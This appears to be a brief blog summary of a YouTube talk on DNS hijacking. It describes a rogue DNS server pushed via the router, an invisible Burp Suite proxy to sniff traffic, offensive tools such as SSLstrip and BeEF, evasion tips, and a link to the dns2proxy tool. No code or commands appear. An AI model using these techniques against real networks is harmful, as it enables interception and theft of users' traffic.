A screenshot from the following Youtube video(below) – by Lenardo Ve:
This is an instructive video how DNS can be hacked and attacked. And if successful it could cause an attackers proxy system to embed itself into the web traffic of the company.
Notice that the evil proxy server that placed itself in your DNS traffic (using methods described in early part of video) Using Metasploit, DNSMasq, and a BIND server.
Then an invisible proxy is set up using burpsuite, mitmproxy,SSLstrip, use HTML injection with BeEF and exploit kits, bounce to known servers with SSLsplit, set up fake web server by defacing or phishing.
The proxy can sniff data and capture network traffic, especially traffic that is not encrypted.
If the attacker does not want to be detected then the following need to be kept in mind:
He (Leonardo) also discusses HSTS (HTTP Strict Transport Security) which is mentioned as a non-critical item with regard to the attacker being found out
The SSH signatures failure could be a critical problem especially a banner problem, as it is obvious errors if the user is attempting to view the attavcc
Limitations of this method: Limited hosts interceptions, time to study IP communication matters, limited clear text procedures.
How is he attacking? using the DNS feature of high availability and load balancing.
for example he shows a sample Google request – can go to 5 DNS systems
Victim requests to router a server ip
the router sends a fake dns server ip
Victim uses DNS A request through an attacker proxy and the attacker’s proxy server sends the name to the real dns server.
The real dns server sends the correct response of the real server IP address.
At this point burpsuite is fired up and set up as an invisible proxy (this is how one can sniff the network traffic)
This is not an easy hack, but can be done – if one can add the attacking DNS server in the initial router requests or modify the dns tables to add your attacking server as a secondary server.
His tool is at https://github.com/LeonardoNve/dns2proxy